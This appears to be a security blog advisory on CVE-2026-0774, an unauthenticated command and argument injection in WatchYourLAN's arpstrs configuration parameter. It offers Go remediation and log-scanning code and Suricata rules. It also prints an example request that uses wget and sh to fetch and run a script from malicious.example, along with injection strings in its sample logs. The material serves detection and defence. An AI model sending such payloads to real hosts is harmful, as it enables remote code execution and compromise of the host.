CVE-2026-0774: Unauthenticated Network-Adjacent RCE Exposes WatchYourLAN Systems to Silent Command Injection Attacks

CVE-2026-0774 – WatchYourLAN Argument Injection → Network-Adjacent Remote Code Execution

CVE: CVE-2026-0774
Name: WatchYourLAN Configuration Page Argument Injection Remote Code Execution Vulnerability
CVSS v3.1 Base Score: 8.8 (High), consistent with the vector AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity: High
Attack complexity: Low (no authentication, no privileges, no user interaction; the attacker must be network-adjacent)
Exploit Availability: No publicly disclosed proof-of-concept at this time
Official Patch / Upgrade: Not available at the time of writing


What the Vulnerability Actually Is

WatchYourLAN is a lightweight network-monitoring tool, written in Go, that discovers hosts by driving the arp-scan utility and exposes a web-based management interface. Its configuration page accepts a parameter for ARP strings (arpstrs). That parameter is expected to be a simple text string, but the application takes whatever a client sends and passes it, unchecked, into the command line of a process it spawns on the host.

Because the input is neither validated nor escaped, shell metacharacters and command separators (;, |, &&, backticks, $(...)) are interpreted by the shell that runs the command. Anyone on the same network who sends a crafted HTTP request with such content in the arpstrs field can make the server run operating-system commands of their choosing. That is remote code execution: the attacker's commands run on the host where WatchYourLAN is installed, with the privileges of the WatchYourLAN service process. One caveat for anyone building detections: the vulnerability's formal title calls it argument injection. If the value is split into arguments for the external tool rather than handed to a shell, separators such as ; are inert, and the injection instead takes the form of extra options (tokens beginning with -) that change what the tool does. Filtering and detection should cover both forms.

This is dangerous because no login or credentials are required: network access to the WatchYourLAN web interface is enough to attempt exploitation.
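The two process-spawning patterns in question, as an added illustration (this is not WatchYourLAN's code and not an exploit): the value is either spliced into a string that /bin/sh parses, or passed as its own argv element, followed by a hypothetical allow-list that rejects both shell metacharacters and option-like tokens. echo stands in for the real scanner tool so the demo runs anywhere with a shell; the ARP target syntax accepted by the allow-list is an assumption.

```go
// Added illustration (not WatchYourLAN's code): the two ways a web handler can hand a
// request parameter to an external tool, and an allow-list that blocks both injection
// forms. "echo" stands in for the real scanner so the demo runs anywhere with /bin/sh.
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// RunViaShell is the vulnerable pattern: the value is spliced into a string that
// /bin/sh parses, so ';', '|', '&&', backticks and $(...) become new commands.
func RunViaShell(tool, value string) (string, error) {
	out, err := exec.Command("sh", "-c", tool+" "+value).CombinedOutput()
	return string(out), err
}

// RunViaArgv spawns the tool directly with the value as one argv element. No shell
// runs, so metacharacters are inert. It is still an argument-injection risk if the
// value may start with '-' and the tool interprets it as an option.
func RunViaArgv(tool, value string) (string, error) {
	out, err := exec.Command(tool, value).CombinedOutput()
	return string(out), err
}

// targetListRe is a hypothetical allow-list for an ARP target list: hex, dotted or
// CIDR style tokens separated by spaces or commas. No token may begin with '-', and no
// shell metacharacter is in the set, so both injection forms fail validation.
var targetListRe = regexp.MustCompile(
	`^[0-9A-Fa-f][0-9A-Fa-f.:/-]*(?:[ ,]+[0-9A-Fa-f][0-9A-Fa-f.:/-]*)*$`)

// BuildSafeArgv validates the untrusted value and splits it into argv entries so
// the caller can use exec.Command(tool, argv...) with no shell in between.
func BuildSafeArgv(value string) ([]string, error) {
	value = strings.TrimSpace(value)
	if len(value) == 0 || len(value) > 256 {
		return nil, errors.New("arpstrs: empty or too long")
	}
	if !targetListRe.MatchString(value) {
		return nil, errors.New("arpstrs: rejected by allow-list")
	}
	return strings.FieldsFunc(value, func(r rune) bool { return r == ' ' || r == ',' }), nil
}

func main() {
	payload := "192.168.1.1; echo INJECTED"    // constructed attacker value
	shellOut, _ := RunViaShell("echo", payload) // two lines of output: the injection ran
	argvOut, _ := RunViaArgv("echo", payload)   // the payload is printed literally
	fmt.Printf("shell:\n%sargv:\n%s", shellOut, argvOut)
	for _, v := range []string{"192.168.1.0/24, 10.0.0.1", payload, "10.0.0.1 --file=/etc/passwd"} {
		argv, err := BuildSafeArgv(v)
		fmt.Printf("%q -> argv=%v err=%v\n", v, argv, err)
	}
}
```

Running it shows the shell form executing the injected echo while the argv form prints the payload unchanged; the allow-list rejects the metacharacter payload, the option-like token and anything not shaped like a target list. Validation plus argv (never a shell string) is the fix shape regardless of which form the real bug takes.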


How It Could Be Exploited in the Real World

  1. Network Access — "Network-adjacent" (CVSS AV:A) means the attacker must be on a network segment from which WatchYourLAN's web UI is reachable: the same LAN or Wi-Fi, or a VPN that places them there. No credentials are needed.
  2. Malicious HTTP Request — The attacker crafts an HTTP GET or POST request targeting the page where arpstrs is processed and includes shell metacharacters and additional malicious commands inside that parameter.
  3. Shell Interpretation — Because the web application inserts the supplied value into a command it spawns without validating it, the shell parses and executes the injected commands (or, in the argument-injection form, the external tool acts on the injected options).
  4. Executed Payload — Once commands run, the attacker can:
    • Read or write files the service account can access
    • Launch additional tools or download payloads
    • Try to pivot deeper into the network
    • Install backdoors or malware for persistence

This is classic command injection (CWE-77/CWE-78; the argument-injection form is CWE-88) with a remote code execution outcome.


Why It’s Serious

  • No authentication required: An attacker doesn’t need to log in or otherwise authenticate to send the malicious request.
  • Local system control: Execution happens with the privileges of the service user. arp-scan needs raw-socket privileges, so WatchYourLAN is commonly run as root or with CAP_NET_RAW, which gives an attacker broad access on many installs.
  • No internet exposure needed: Direct public internet exposure isn't required. If the service sits on an internal network, anyone on that network can attempt exploitation.

These traits put this firmly in the “high risk” category even without a published exploit.


What a Detection or Exploitation Request Might Look Like

An attacker trying to exploit this would likely send requests that stand out in server logs. For example (the /config path and the placement of arpstrs in the query string are illustrative; the real endpoint depends on the deployed version, and no public proof of concept exists at the time of writing):

GET /config?arpstrs=192.168.1.1%3Bwget%20http://malicious.example/payload.sh%20-O%20/tmp/x.sh%3Bsh%20/tmp/x.sh HTTP/1.1
Host: watchyourlan.local

The key point is the injection of shell metacharacters and commands (; sent as %3B, wget, sh, and so on) into a parameter that should only ever carry a plain string. Spaces and separators arrive percent-encoded in a real request, so detection must either decode before matching or match the encoded forms as well.

In logs, defenders should be watching for:

  • arpstrs= with embedded characters such as ;, |, &&, backticks, or $( patterns, and tokens beginning with - that the external tool would read as options
  • URL-encoded variants of these (%3B, %7C, %26, %60, %24%28), and double-encoded ones (%253B)
  • Unexpected child processes of the WatchYourLAN service (sh, curl, wget, and similar)

How You Can Detect Exploitation Attempts

Logs to Monitor

  • Web access logs — Look specifically at requests to WatchYourLAN’s configuration endpoints and examine query strings or request bodies that include arpstrs.
  • Application debug or audit logs — Any errors showing unexpected arguments or child process execution.
  • System process logs — The OS’s audit logs (e.g., auditd) for new processes started by the WatchYourLAN service.
  • Network IDS / firewall logs — Alerts or traffic patterns that include suspicious HTTP query strings.
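A small access-log scanner, added here as an example that is not part of the original post, implementing the checks from the two lists above over constructed combined-log-format lines: it decodes the query string once, as the application would, then flags shell metacharacters, option-like tokens and double-encoded payloads. The /config path and the arpstrs query parameter follow the illustrative request earlier on the page and are assumptions about the real endpoint.

```go
// Added example (not WatchYourLAN's code, not part of the original post): scan web
// access logs for arpstrs values carrying shell metacharacters or option-like tokens,
// including URL-encoded and double-encoded forms. Log lines are constructed samples;
// the /config path and the arpstrs placement are assumptions from the write-up.
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// requestRe pulls the request target out of a combined-log-format line.
var requestRe = regexp.MustCompile(`"(?:GET|POST|PUT|PATCH) (\S+) HTTP/`)

// metaRe lists the characters that let a value escape a shell command line.
var metaRe = regexp.MustCompile("[;|&`$(){}\n\r]")

// Finding records one suspicious arpstrs value and why it was flagged.
type Finding struct {
	Line   int
	Client string
	Value  string // decoded value, as the application would see it
	Reason string
}

// Suspicious classifies a decoded parameter value. It returns ("", false) when clean.
func Suspicious(value string) (string, bool) {
	if metaRe.MatchString(value) {
		return "shell metacharacter", true
	}
	for _, tok := range strings.Fields(value) {
		if strings.HasPrefix(tok, "-") {
			return "option-like token (argument injection)", true
		}
	}
	// Double-encoded payloads (%253B -> %3B -> ;) survive one decode; try a second.
	if again, err := url.QueryUnescape(value); err == nil && again != value && metaRe.MatchString(again) {
		return "double-encoded shell metacharacter", true
	}
	return "", false
}

// ScanAccessLog returns a Finding for each logged request whose arpstrs query
// parameter looks like an injection attempt. POST bodies are not in access logs,
// so those need the application or IDS layer.
func ScanAccessLog(lines []string) []Finding {
	var findings []Finding
	for i, line := range lines {
		m := requestRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		u, err := url.Parse(m[1])
		if err != nil {
			continue
		}
		for _, v := range u.Query()["arpstrs"] { // Query() percent-decodes once
			if reason, bad := Suspicious(v); bad {
				findings = append(findings, Finding{i + 1, strings.Fields(line)[0], v, reason})
			}
		}
	}
	return findings
}

// SampleLog is constructed test data in combined log format.
var SampleLog = []string{
	`10.0.0.5 - - [12/Feb/2026:10:01:02 +0000] "GET /config?arpstrs=192.168.1.0%2F24 HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
	`10.0.0.9 - - [12/Feb/2026:10:01:07 +0000] "GET /config?arpstrs=192.168.1.1%3Bwget%20http%3A%2F%2Fmalicious.example%2Fpayload.sh%20-O%20%2Ftmp%2Fx.sh HTTP/1.1" 200 512 "-" "curl/8.5.0"`,
	`10.0.0.9 - - [12/Feb/2026:10:01:09 +0000] "GET /config?arpstrs=%24%28id%29 HTTP/1.1" 200 512 "-" "curl/8.5.0"`,
	`10.0.0.9 - - [12/Feb/2026:10:01:11 +0000] "GET /config?arpstrs=10.0.0.1+--file%3D%2Fetc%2Fpasswd HTTP/1.1" 200 512 "-" "curl/8.5.0"`,
	`10.0.0.9 - - [12/Feb/2026:10:01:13 +0000] "GET /config?arpstrs=10.0.0.1%253Bid HTTP/1.1" 200 512 "-" "curl/8.5.0"`,
	`10.0.0.7 - - [12/Feb/2026:10:02:00 +0000] "GET /static/app.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"`,
}

func main() {
	for _, f := range ScanAccessLog(SampleLog) {
		fmt.Printf("line %d client %s: %s (%q)\n", f.Line, f.Client, f.Reason, f.Value)
	}
}
```

Against the sample, the first line (a plain CIDR) is clean and the four requests from 10.0.0.9 are flagged with distinct reasons. Decoding once before matching is what makes %3B and a literal ; the same event; the second decode pass is there because a proxy or WAF that decodes once will otherwise pass %253B straight through.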

Suricata Rule

Here is a starting-point pair of Suricata rules to flag HTTP requests attempting to inject shell characters (or option-like tokens) into the arpstrs field, in the query string and in a POST body:

alert http any any -> any any (msg:"WatchYourLAN arpstrs command-injection attempt (URI)"; \
  flow:established,to_server; http.uri.raw; content:"arpstrs="; nocase; \
  pcre:"/arpstrs=[^&]*(?:[\x3b\x7c\x60\x24\x28]|%3b|%7c|%60|%24%28|%26)/i"; \
  classtype:web-application-attack; sid:1000001; rev:2;)
alert http any any -> any any (msg:"WatchYourLAN arpstrs command-injection attempt (body)"; \
  flow:established,to_server; http.request_body; content:"arpstrs="; nocase; \
  pcre:"/arpstrs=[^&]*(?:[\x3b\x7c\x60\x24\x28]|%3b|%7c|%60|%24%28|%26)/i"; \
  classtype:web-application-attack; sid:1000002; rev:1;)

Rule Details

  • Both rules match only client-to-server traffic on an established flow and use the Suricata 5+ sticky-buffer syntax (http.uri.raw, http.request_body) rather than the deprecated uricontent modifier; older Suricata and Snort 2 need the legacy modifier form
  • The first rule inspects the raw, undecoded request URI, so literal metacharacters and their percent-encoded forms (%3B, %7C, %60, %24%28, %26) are both caught; the second applies the same pattern to POST bodies, which the URI rule cannot see
  • any any -> any any is deliberate: the attacker is network-adjacent, so $EXTERNAL_NET -> $HOME_NET would miss internal sources
  • The sid values sit in the 1000000-1999999 range reserved for local rules; tune the pattern if legitimate arpstrs values in your environment ever contain these characters

Practical Detection

Defenders should consider:

  • Filtering on suspicious characters at the reverse proxy or WAF layer before traffic reaches the application, and restricting who can reach the management interface at all (firewall or VLAN rules, or an authenticating proxy in front of it).
  • Alerting on unusual child processes of the WatchYourLAN process (for example spawning /bin/sh, or invoking wget/curl); an auditd execve watch keyed on the service account's uid is a simple way to collect this.
  • Rate limiting or blocking source addresses that send repeated malformed arpstrs requests; since the attacker is on an adjacent network, do not limit this to external IPs.

Final Takeaway

In simple terms, this vulnerability exists because WatchYourLAN trusted input it shouldn’t have. That trust, combined with using that input in a system call, means an attacker can get the host to do almost anything the attacker wants — as long as they can talk to the management interface. There isn’t a tricky exploit needed: it’s about inserting characters that change the command the server runs.

At the time of writing there is no official patch, so defenders have to be extra cautious until an upgrade is available. Restricting access to the management interface, monitoring logs, and deploying detection rules are the best bets until the official fix ships.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.